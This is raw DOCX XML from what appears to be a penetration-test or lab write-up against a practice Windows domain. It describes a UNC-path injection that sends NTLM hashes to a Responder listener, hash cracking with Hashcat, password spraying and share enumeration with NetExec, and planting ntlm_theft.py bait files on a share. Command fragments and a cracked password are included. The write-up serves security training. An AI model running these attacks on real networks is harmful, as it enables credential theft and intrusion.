      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relay-related vulnerability. The application attempted authentication against the pentester-controlled </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server configured with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, enabling capture of the credential in hash format.</w:t>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A">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>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18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://academy.jarvis.hc/?page=\\&lt;vpn-ip&gt;\share</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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75113"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="91" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2175113"/>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2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Thus, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash associated with the user was successfully captured, confirming exploitation of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="95"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943600" cy="1028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1">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Hashcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was used to correctly identify the hash type and subsequently perform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password cracking via brute force.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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hashcat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hash.txt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--identify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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977900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="93"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5943600" cy="9779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password for user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_jarvis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was successfully cracked after the brute-force process.</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svc_jarvis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!QAZ2wsx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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81300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="94"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5943600" cy="2781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credentials of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_jarvis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service was used to enumerate existing users on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">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F">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nxc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ldap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&lt;machine-ip&gt;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--dns-server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jarvis.hc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svc_jarvis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'!QAZ2wsx'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awk</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{'print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tail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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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1">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svc_jarvis,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P.Parker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,C.Barton,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Administrator,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jalem.bipel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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82700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="96" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1282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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sing the </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NetExec </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(nxc)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password spray</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack was performed, applying the discovered password to other users within the environment. This procedure allowed identification of two additional valid accounts sharing the same credential.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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7">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8">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nxc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rdp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&lt;machine-ip&gt;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users.txt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'!QAZ2wsx'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--continue-on-success</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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A">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jarvis.hc\svc_jarvis:!QAZ2wsx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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jarvis.hc\P.Parker:!QAZ2wsx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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jarvis.hc\C.Barton:!QAZ2wsx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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4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28700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="97" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="10287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Repeating service enumeration using the newly identified user revealed that, via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the account </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">P.Parker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had read and write permissions on the share named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AI_Projects</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51">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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netexec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smb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jarvis.hc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P.Parker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'!QAZ2wsx'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--shares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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71600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="98" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1371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Since user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">P.Parker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had access to the SMB share </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AI_Projects</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, this access was leveraged to plant malicious files aimed at capturing credentials from other network users. </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attack leverages Windows’ default behavior when accessing files that reference an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">external SMB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resource. When a user opens or merely accesses a file containing a path pointing to a remote share, Windows automatically attempts authentication to that resource. During this process, the system sends the user’s </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, potentially resulting in capture of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLMv2 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hash if the share points to an attacker-controlled server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ntlm_theft.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to generate multiple file types designed to trigger </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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A">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B">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python3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ntlm_theft.py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all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&lt;vpn-ip&gt;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payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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08400"/>
